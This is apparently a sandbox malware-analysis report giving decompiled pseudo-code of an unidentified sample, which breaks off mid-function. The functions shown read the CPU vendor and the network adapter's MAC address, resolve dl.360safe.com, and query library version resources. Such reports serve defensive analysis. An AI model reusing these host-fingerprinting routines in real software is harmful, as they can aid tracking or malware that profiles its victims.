                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSectionTrim$EnterLeave_memset
                                                                                                                                                                                          • String ID: %s,%x,%s$GenuineIntel$GenuineIotel
                                                                                                                                                                                          • API String ID: 2102966345-3957904936
                                                                                                                                                                                          • Opcode ID: 95761492f8dbdf7cd08e5bd929e86a6ef81d8e31dfa21d337a539e90fb701089
                                                                                                                                                                                          • Instruction ID: b93a6e72bc2f8b2f90cfb69a19c33de6f0b80590cc60549532ab9e0a2881f5c1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 95761492f8dbdf7cd08e5bd929e86a6ef81d8e31dfa21d337a539e90fb701089
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3881F2B0A087419FC364DF29D481A1BBBE1FB88714F508A2EF499D3350E771D9458F66
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CFED50 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 110COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                                                                          			E00CFED50(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				signed char _v259;
				char _v260;
				signed int _v276;
				char _v314;
				short _v316;
				signed char* _v320;
				void* _v324;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				void* _t33;
				char* _t40;
				void* _t42;
				void* _t48;
				signed int _t49;
				char _t61;
				void* _t65;
				void* _t71;
				void* _t72;
				signed int _t73;
				signed int _t74;
				void* _t75;

				_t73 =  &_v324;
				_t28 =  *0xd64070; // 0x8a9e1774
				_v4 = _t28 ^ _t73;
				_t70 = _a4;
				E00D006A0(_a4,  &_v324, 0, 0x40);
				_t62 = 0x100;
				_v324 = 0x37;
				_v320 =  &_v260;
				_v316 = 0x100;
				_t33 = E00CFE000( &_v324);
				_t74 = _t73 + 0x10;
				if(_t33 != 0) {
					L10:
					return E00D0071A(0, _t48, _v4 ^ _t74, _t62, _t70, _t71);
				} else {
					_push(_t48);
					_t49 = _v259 & 0x000000ff;
					_push(_t71);
					E00D006A0(_t70,  &_v324, 0, 0x40);
					_v324 = 0x32;
					_v276 = _t49;
					E00CFE000( &_v324);
					E00D006A0(_t70,  &_v324, 0, 0x40);
					_t40 =  &_v314;
					_t75 = _t74 + 0x1c;
					_v324 = 0x33;
					_v276 = _t49;
					_t72 = 0x10;
					_t65 = "*               " - _t40;
					while(1) {
						_t18 = _t72 + 0x7fffffee; // 0x7ffffffe
						if(_t18 == 0) {
							break;
						}
						_t61 =  *((intOrPtr*)(_t65 + _t40));
						if(_t61 == 0) {
							break;
						} else {
							 *_t40 = _t61;
							_t40 = _t40 + 1;
							_t72 = _t72 - 1;
							if(_t72 != 0) {
								continue;
							} else {
								L7:
								_t40 = _t40 - 1;
							}
						}
						L8:
						 *_t40 = 0;
						_t62 = 0x258;
						_v320 = 0xd67788;
						_v316 = 0x258;
						_t42 = E00CFE000( &_v324);
						_t74 = _t75 + 4;
						_pop(_t71);
						_pop(_t48);
						if(_t42 != 0) {
							goto L10;
						} else {
							_push( *0xd6778d & 0x000000ff);
							_push( *0xd6778c & 0x000000ff);
							_push( *0xd6778b & 0x000000ff);
							_push( *0xd6778a & 0x000000ff);
							return E00D0071A(0 | E00C926B0(_t70, _a8, "%02X%02X%02X%02X%02X%02X",  *0xd67788 & 0x000000ff) >= 0x00000000, _t48, _v4 ^ _t74 + 0x00000024, 0 | E00C926B0(_t70, _a8, "%02X%02X%02X%02X%02X%02X",  *0xd67788 & 0x000000ff) >= 0x00000000, _t70, _t71,  *0xd67789 & 0x000000ff);
						}
						goto L11;
					}
					if(_t72 == 0) {
						goto L7;
					}
					goto L8;
				}
				L11:
			}



























                                                                                                                                                                                          0x00cfed50
                                                                                                                                                                                          0x00cfed56
                                                                                                                                                                                          0x00cfed5d
                                                                                                                                                                                          0x00cfed65
                                                                                                                                                                                          0x00cfed75
                                                                                                                                                                                          0x00cfed82
                                                                                                                                                                                          0x00cfed88
                                                                                                                                                                                          0x00cfed8d
                                                                                                                                                                                          0x00cfed91
                                                                                                                                                                                          0x00cfed96
                                                                                                                                                                                          0x00cfed9b
                                                                                                                                                                                          0x00cfeda0
                                                                                                                                                                                          0x00cfeead
                                                                                                                                                                                          0x00cfeec4
                                                                                                                                                                                          0x00cfeda6
                                                                                                                                                                                          0x00cfeda6
                                                                                                                                                                                          0x00cfeda7
                                                                                                                                                                                          0x00cfedac
                                                                                                                                                                                          0x00cfedb6
                                                                                                                                                                                          0x00cfedc0
                                                                                                                                                                                          0x00cfedc5
                                                                                                                                                                                          0x00cfedc9
                                                                                                                                                                                          0x00cfedd7
                                                                                                                                                                                          0x00cfeddc
                                                                                                                                                                                          0x00cfede7
                                                                                                                                                                                          0x00cfedea
                                                                                                                                                                                          0x00cfedef
                                                                                                                                                                                          0x00cfedf3
                                                                                                                                                                                          0x00cfedf8
                                                                                                                                                                                          0x00cfee00
                                                                                                                                                                                          0x00cfee00
                                                                                                                                                                                          0x00cfee08
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfee0a
                                                                                                                                                                                          0x00cfee0f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfee11
                                                                                                                                                                                          0x00cfee11
                                                                                                                                                                                          0x00cfee13
                                                                                                                                                                                          0x00cfee14
                                                                                                                                                                                          0x00cfee17
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfee19
                                                                                                                                                                                          0x00cfee1f
                                                                                                                                                                                          0x00cfee1f
                                                                                                                                                                                          0x00cfee1f
                                                                                                                                                                                          0x00cfee17
                                                                                                                                                                                          0x00cfee20
                                                                                                                                                                                          0x00cfee20
                                                                                                                                                                                          0x00cfee27
                                                                                                                                                                                          0x00cfee2d
                                                                                                                                                                                          0x00cfee35
                                                                                                                                                                                          0x00cfee3a
                                                                                                                                                                                          0x00cfee3f
                                                                                                                                                                                          0x00cfee42
                                                                                                                                                                                          0x00cfee43
                                                                                                                                                                                          0x00cfee46
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfee48
                                                                                                                                                                                          0x00cfee5d
                                                                                                                                                                                          0x00cfee65
                                                                                                                                                                                          0x00cfee6d
                                                                                                                                                                                          0x00cfee75
                                                                                                                                                                                          0x00cfeeac
                                                                                                                                                                                          0x00cfeeac
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfee46
                                                                                                                                                                                          0x00cfee1d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfee1d
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CFED75
                                                                                                                                                                                            • Part of subcall function 00CFE000: GetProcAddress.KERNEL32(00000000,Netbios), ref: 00CFE023
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CFEDB6
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CFEDD7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset$AddressProc
                                                                                                                                                                                          • String ID: %02X%02X%02X%02X%02X%02X$* $2$3$7
                                                                                                                                                                                          • API String ID: 2047085092-1802369251
                                                                                                                                                                                          • Opcode ID: 67ebf993bb4884c590c487fa58247ac2a43e324316d7c206d54fb7583bc7679f
                                                                                                                                                                                          • Instruction ID: cb545fdb38e32e4f1950ca1809e659d1462770f18c817fabc84fe556941e795d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 67ebf993bb4884c590c487fa58247ac2a43e324316d7c206d54fb7583bc7679f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F41057050C3846BD715CB25DC41BABBBE99FD6300F44486DF6D8872A1E6B896098B73
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8AF12 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 85networkCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 35%
                                                                                                                                                                                          			E00C8AF12(unsigned int __eax, unsigned int __edx, void* __edi, void* __esi) {
				unsigned int _t28;
				intOrPtr* _t31;
				intOrPtr* _t32;
				void* _t37;
				char _t43;
				intOrPtr _t44;
				char* _t50;
				void* _t51;
				void* _t53;
				void* _t54;
				signed int _t55;
				void* _t56;
				void* _t57;
				intOrPtr* _t58;
				signed int _t60;
				signed int _t61;

				_t56 = __esi;
				_t53 = __edi;
				_t48 = __edx;
				_t28 = __eax >> 8;
				if(_t28 != 2) {
					_push("init socket failed");
					goto L14;
				} else {
					__imp__#52("dl.360safe.com");
					 *(_t61 + 0x1c) = _t28;
					_t64 = _t28;
					if(_t28 != 0) {
						_t58 =  *((intOrPtr*)(_t28 + 0xc));
						_t60 = 0;
						__eflags =  *_t58;
						if( *_t58 != 0) {
							_t55 = 0;
							__eflags = 0;
							do {
								 *((char*)(_t61 + 0x1d8)) = 0;
								E00D006A0(_t55, _t61 + 0x1d1, 0, 0x103);
								_t31 =  *((intOrPtr*)(_t58 + _t55));
								_t61 = _t61 + 0xc;
								__imp__#12( *_t31);
								_t50 = _t61 + 0x1cc;
								do {
									_t43 =  *_t31;
									 *_t50 = _t43;
									_t31 = _t31 + 1;
									_t50 = _t50 + 1;
									__eflags = _t43;
								} while (_t43 != 0);
								_t32 = _t61 + 0x1cc;
								 *((intOrPtr*)(_t61 + 0x38)) = 0xf;
								 *((intOrPtr*)(_t61 + 0x34)) = 0;
								 *((char*)(_t61 + 0x24)) = 0;
								_t51 = _t32 + 1;
								do {
									_t44 =  *_t32;
									_t32 = _t32 + 1;
									__eflags = _t44;
								} while (_t44 != 0);
								_t52 = _t61 + 0x1d0;
								E00C8BF80(0, _t61 + 0x28, _t61 + 0x1d0, _t32 - _t51);
								 *((intOrPtr*)(_t61 + 0x2e8)) = 0;
								_t28 = E00C8B950( *((intOrPtr*)(_t61 + 0x18)), _t61 + 0x20);
								 *((intOrPtr*)(_t61 + 0x2e4)) = 0xffffffff;
								__eflags =  *((intOrPtr*)(_t61 + 0x38)) - 0x10;
								if(__eflags >= 0) {
									_t28 = E00D0068E(0, _t52, _t55, _t58, __eflags,  *((intOrPtr*)(_t61 + 0x24)));
									_t61 = _t61 + 4;
								}
								_t48 =  *(_t61 + 0x1c);
								_t58 =  *((intOrPtr*)( *(_t61 + 0x1c) + 0xc));
								_t60 = _t60 + 1;
								__eflags =  *((intOrPtr*)(_t58 + _t60 * 4));
								_t55 = _t60 * 4;
							} while ( *((intOrPtr*)(_t58 + _t60 * 4)) != 0);
						}
						__imp__#116();
					} else {
						__imp__#116();
						_push("pHost == NULL \n");
						L14:
						_t28 = L00D04365(0, _t48, _t53, _t56, _t64);
						_t61 = _t61 + 4;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t61 + 0x2dc));
				_pop(_t54);
				_pop(_t57);
				_pop(_t37);
				return E00D0071A(_t28, _t37,  *(_t61 + 0x2c0) ^ _t61, _t48, _t54, _t57);
			}



















                                                                                                                                                                                          0x00c8af12
                                                                                                                                                                                          0x00c8af12
                                                                                                                                                                                          0x00c8af12
                                                                                                                                                                                          0x00c8af12
                                                                                                                                                                                          0x00c8af17
                                                                                                                                                                                          0x00c8b014
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8af1d
                                                                                                                                                                                          0x00c8af22
                                                                                                                                                                                          0x00c8af2a
                                                                                                                                                                                          0x00c8af2e
                                                                                                                                                                                          0x00c8af30
                                                                                                                                                                                          0x00c8af42
                                                                                                                                                                                          0x00c8af45
                                                                                                                                                                                          0x00c8af47
                                                                                                                                                                                          0x00c8af49
                                                                                                                                                                                          0x00c8af4f
                                                                                                                                                                                          0x00c8af4f
                                                                                                                                                                                          0x00c8af51
                                                                                                                                                                                          0x00c8af5f
                                                                                                                                                                                          0x00c8af66
                                                                                                                                                                                          0x00c8af6b
                                                                                                                                                                                          0x00c8af70
                                                                                                                                                                                          0x00c8af74
                                                                                                                                                                                          0x00c8af7a
                                                                                                                                                                                          0x00c8af81
                                                                                                                                                                                          0x00c8af81
                                                                                                                                                                                          0x00c8af83
                                                                                                                                                                                          0x00c8af85
                                                                                                                                                                                          0x00c8af86
                                                                                                                                                                                          0x00c8af87
                                                                                                                                                                                          0x00c8af87
                                                                                                                                                                                          0x00c8af8b
                                                                                                                                                                                          0x00c8af92
                                                                                                                                                                                          0x00c8af9a
                                                                                                                                                                                          0x00c8af9e
                                                                                                                                                                                          0x00c8afa2
                                                                                                                                                                                          0x00c8afa5
                                                                                                                                                                                          0x00c8afa5
                                                                                                                                                                                          0x00c8afa7
                                                                                                                                                                                          0x00c8afa8
                                                                                                                                                                                          0x00c8afa8
                                                                                                                                                                                          0x00c8afaf
                                                                                                                                                                                          0x00c8afbb
                                                                                                                                                                                          0x00c8afc9
                                                                                                                                                                                          0x00c8afd0
                                                                                                                                                                                          0x00c8afd5
                                                                                                                                                                                          0x00c8afe0
                                                                                                                                                                                          0x00c8afe5
                                                                                                                                                                                          0x00c8afec
                                                                                                                                                                                          0x00c8aff1
                                                                                                                                                                                          0x00c8aff1
                                                                                                                                                                                          0x00c8aff4
                                                                                                                                                                                          0x00c8aff8
                                                                                                                                                                                          0x00c8affb
                                                                                                                                                                                          0x00c8affc
                                                                                                                                                                                          0x00c8afff
                                                                                                                                                                                          0x00c8afff
                                                                                                                                                                                          0x00c8af51
                                                                                                                                                                                          0x00c8b00c
                                                                                                                                                                                          0x00c8af32
                                                                                                                                                                                          0x00c8af32
                                                                                                                                                                                          0x00c8af38
                                                                                                                                                                                          0x00c8b019
                                                                                                                                                                                          0x00c8b019
                                                                                                                                                                                          0x00c8b01e
                                                                                                                                                                                          0x00c8b01e
                                                                                                                                                                                          0x00c8af30
                                                                                                                                                                                          0x00c8b028
                                                                                                                                                                                          0x00c8b030
                                                                                                                                                                                          0x00c8b031
                                                                                                                                                                                          0x00c8b033
                                                                                                                                                                                          0x00c8b048

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Cleanup$_memsetgethostbynameinet_ntoa
                                                                                                                                                                                          • String ID: dl.360safe.com$init socket failed$pHost == NULL
                                                                                                                                                                                          • API String ID: 1981794053-2576187975
                                                                                                                                                                                          • Opcode ID: 5244224a8b5afdd907235af41b09c75fdc77498084600e06bf85881d1d614c12
                                                                                                                                                                                          • Instruction ID: 3d643a07656a9622d885f4edc864675faf6181e8af023f5d1f4330afb28e7eeb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5244224a8b5afdd907235af41b09c75fdc77498084600e06bf85881d1d614c12
                                                                                                                                                                                          • Instruction Fuzzy Hash: BD313971109381DFD324EF64D485AABB7E1EFC8304F04492EE1DA47250D7309948CB93
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8F6F0 Relevance: 13.6, APIs: 9, Instructions: 80libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                          			E00C8F6F0(WCHAR* __eax, void* _a4) {
				int _v4;
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t14;
				void* _t21;
				void* _t29;
				void* _t31;
				struct HINSTANCE__* _t34;
				WCHAR* _t35;
				void* _t36;
				long _t38;

				_t40 =  &_v8;
				_t25 = 0;
				_t34 = LoadLibraryExW(__eax, 0, 2);
				if(_t34 != 0) {
					_t31 = FindResourceW(_t34, 1, 0x10);
					if(_t31 != 0) {
						_t38 = SizeofResource(_t34, _t31);
						_t31 = LoadResource(_t34, _t31);
						if(_t31 != 0) {
							_t21 = LockResource(_t31);
							_v8 = _t21;
							if(_t21 != 0) {
								_t25 = E00D017AD(0, _t29, _t31, _t38);
								_t40 =  &(( &_v8)[1]);
								if(_t25 != 0) {
									E00D06580(_t25, _t31, _t34, _t25, _v8, _t38);
									_t40 =  &(_t40[3]);
								}
							}
							FreeResource(_t31);
						}
					}
					FreeLibrary(_t34);
				}
				_t35 = 0;
				if(_t25 != 0) {
					_t30 =  &_v4;
					_v8 = 0;
					_v4 = 0;
					_t14 = VerQueryValueW(_t25, 0xd48b4c,  &_v8,  &_v4);
					_t48 = _t14;
					if(_t14 != 0) {
						_t36 = _v8;
						memcpy(_a4, _t36, 0xd << 2);
						_t40 =  &(_t40[3]);
						_t31 = _t36 + 0x1a;
						_t35 = 1;
					}
					_push(_t25);
					E00D0092B(_t25, _t30, _t31, _t35, _t48);
				}
				return _t35;
			}

















                                                                                                                                                                                          0x00c8f6f0
                                                                                                                                                                                          0x00c8f6f8
                                                                                                                                                                                          0x00c8f702
                                                                                                                                                                                          0x00c8f706
                                                                                                                                                                                          0x00c8f713
                                                                                                                                                                                          0x00c8f717
                                                                                                                                                                                          0x00c8f724
                                                                                                                                                                                          0x00c8f72c
                                                                                                                                                                                          0x00c8f730
                                                                                                                                                                                          0x00c8f733
                                                                                                                                                                                          0x00c8f739
                                                                                                                                                                                          0x00c8f73f
                                                                                                                                                                                          0x00c8f747
                                                                                                                                                                                          0x00c8f749
                                                                                                                                                                                          0x00c8f74e
                                                                                                                                                                                          0x00c8f757
                                                                                                                                                                                          0x00c8f75c
                                                                                                                                                                                          0x00c8f75c
                                                                                                                                                                                          0x00c8f74e
                                                                                                                                                                                          0x00c8f760
                                                                                                                                                                                          0x00c8f760
                                                                                                                                                                                          0x00c8f766
                                                                                                                                                                                          0x00c8f768
                                                                                                                                                                                          0x00c8f768
                                                                                                                                                                                          0x00c8f76e
                                                                                                                                                                                          0x00c8f772
                                                                                                                                                                                          0x00c8f774
                                                                                                                                                                                          0x00c8f784
                                                                                                                                                                                          0x00c8f788
                                                                                                                                                                                          0x00c8f78c
                                                                                                                                                                                          0x00c8f791
                                                                                                                                                                                          0x00c8f793
                                                                                                                                                                                          0x00c8f795
                                                                                                                                                                                          0x00c8f7a2
                                                                                                                                                                                          0x00c8f7a2
                                                                                                                                                                                          0x00c8f7a2
                                                                                                                                                                                          0x00c8f7a4
                                                                                                                                                                                          0x00c8f7a4
                                                                                                                                                                                          0x00c8f7a9
                                                                                                                                                                                          0x00c8f7aa
                                                                                                                                                                                          0x00c8f7af
                                                                                                                                                                                          0x00c8f7ba

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,761B4EE0,?,?,00C8F677,?), ref: 00C8F6FC
                                                                                                                                                                                          • FindResourceW.KERNEL32(00000000,00000001,00000010), ref: 00C8F70D
                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000,761B4E00), ref: 00C8F71C
                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 00C8F726
                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00C8F733
                                                                                                                                                                                          • _malloc.LIBCMT ref: 00C8F742
                                                                                                                                                                                            • Part of subcall function 00D017AD: __FF_MSGBANNER.LIBCMT ref: 00D017D0
                                                                                                                                                                                            • Part of subcall function 00D017AD: __NMSG_WRITE.LIBCMT ref: 00D017D7
                                                                                                                                                                                            • Part of subcall function 00D017AD: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00D0C457,?,00000001,?,?,00D0EF54,00000018,00D590E8,0000000C,00D0EFE5), ref: 00D01824
                                                                                                                                                                                          • FreeResource.KERNEL32(00000000), ref: 00C8F760
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00C8F768
                                                                                                                                                                                          • VerQueryValueW.VERSION(00000000,00D48B4C,?,?), ref: 00C8F78C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$FreeLibraryLoad$AllocateFindHeapLockQuerySizeofValue_malloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3235057611-0
                                                                                                                                                                                          • Opcode ID: b584c40f554521033213eb880646e1704db8000d3859fa6cf30290174cee1475
                                                                                                                                                                                          • Instruction ID: cb230a1f7d6fb415098ff8c72e515dca16d4ee1e8b5844b9961b528e03e938c1
                                                                                                                                                                                          • Opcode Fuzzy Hash: b584c40f554521033213eb880646e1704db8000d3859fa6cf30290174cee1475
                                                                                                                                                                                          • Instruction Fuzzy Hash: A41105726003116BD311BBA49C89E6F7AACEB85B54F08043DF951D3341EB79DD0687B2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C906C0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 219sleepfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                          			E00C906C0(signed int* __ebx, void* __eflags) {
				char _v8;
				char _v16;
				struct _OVERLAPPED* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				long _v40;
				int _v44;
				char _v48;
				void _v52;
				struct _OVERLAPPED* _v56;
				signed int _v60;
				char _v64;
				char _v68;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t71;
				signed int _t74;
				signed int _t79;
				void* _t81;
				void* _t84;
				signed int _t90;
				intOrPtr* _t95;
				signed int _t100;
				signed int _t107;
				signed int _t111;
				signed int* _t127;
				void* _t129;
				signed int _t141;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t157;
				void* _t164;
				void* _t172;
				void* _t173;
				signed int _t174;
				signed int _t176;
				void* _t177;
				void* _t179;
				void* _t186;

				_t127 = __ebx;
				_t176 = (_t174 & 0xfffffff8) - 0x34;
				_t71 =  *0xd64070; // 0x8a9e1774
				 *[fs:0x0] =  &_v16;
				_t74 =  *0xd68c98; // 0xd46f14
				_t2 = _t74 + 0xc; // 0xd2f706
				_v68 =  *((intOrPtr*)( *_t2))(_t71 ^ _t176, _t157, _t164,  *[fs:0x0], 0xd39140, 0xffffffff) + 0x10;
				_v8 = 0;
				_v56 = 0;
				_v64 = 1;
				E00C8F930(0xd68c98,  &_v64, __eflags);
				_t129 =  &_v68;
				_t79 = E00C8FF60(_t173, _t129,  &_v56);
				_t177 = _t176 + 8;
				_v60 = _t79;
				if(_t79 == 0) {
					L6:
					_t148 =  *0xd68c98; // 0xd46f14
					_t24 = _t148 + 0xc; // 0xd2f706
					_t81 =  *((intOrPtr*)( *_t24))();
					_t149 =  *0xd68c98; // 0xd46f14
					_v36 = _t81 + 0x10;
					_t26 = _t149 + 0xc; // 0xd2f706
					_t84 =  *((intOrPtr*)( *_t26))();
					_t150 =  *0xd68c98; // 0xd46f14
					_v32 = _t84 + 0x10;
					_t28 = _t150 + 0xc; // 0xd2f706
					_v28 =  *((intOrPtr*)( *_t28))() + 0x10;
					_v8 = 1;
					_v24 = 0;
					E00C903D0(_t150,  &_v36);
					_t90 = _v24;
					__eflags = _t90 & 0x00000003;
					if((_t90 & 0x00000003) != 0) {
						__eflags = _v60;
						if(__eflags == 0) {
							L17:
							_v44 = _t90;
							__eflags = (_t90 & 0x00000003) - 3;
							if((_t90 & 0x00000003) == 3) {
								L19:
								_t150 =  *_t127;
								__eflags =  *(_t150 - 0xc);
								if(__eflags != 0) {
									L25:
									E00C90180( &_v68, _t127);
									L26:
									E00C909F0(_t150,  &_v36);
									_v8 = 0xffffffff;
									_t95 = _v68 + 0xfffffff0;
									asm("lock xadd [ecx], edx");
									__eflags = (_t150 | 0xffffffff) - 1;
									L27:
									if(_t186 <= 0) {
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t95)) + 4))))(_t95);
									}
									L29:
									 *[fs:0x0] = _v16;
									return 1;
								}
								L20:
								_t100 = E00C90450( &_v36, __eflags, _t127, _v64);
								_t177 = _t177 + 8;
								__eflags = _t100;
								if(_t100 != 0) {
									goto L25;
								}
								__eflags = _v60;
								if(_v60 == 0) {
									goto L25;
								}
								__eflags = _v56;
								if(_v56 == 0) {
									goto L25;
								}
								E00C91440( &_v68, _t127);
								L24:
								E00C909F0(_t150,  &_v36);
								E00C90DC0( &_v68, _t150);
								goto L29;
							}
							Sleep(0x1f4);
							E00C903D0(_t150,  &_v36);
							__eflags = _v44 - _v24;
							if(__eflags != 0) {
								goto L20;
							}
							goto L19;
						}
						_t141 =  &_v36;
						_t107 = E00C90450(_t141, __eflags, _t127, _v64);
						_t179 = _t177 + 8;
						__eflags = _t107;
						if(_t107 != 0) {
							_t142 = _v68;
							_v68 = _v68 == 0;
							if(_v68 == 0) {
								E00C8DF10(0x80004005);
							}
							_t111 = E00D00DF1(_t150,  *_t127, _t142);
							_t177 = _t179 + 8;
							__eflags = _t111;
							if(_t111 == 0) {
								goto L24;
							} else {
								_t90 = _v24;
								goto L17;
							}
						}
						E00C91440( &_v68, _t127);
						E00C909F0(_t150,  &_v36);
						_v8 = 0xffffffff;
						_t95 = _v68 + 0xfffffff0;
						asm("lock xadd [edx], ecx");
						__eflags = (_t141 | 0xffffffff) - 1;
						goto L27;
					}
					__eflags = _v60;
					if(_v60 == 0) {
						goto L17;
					}
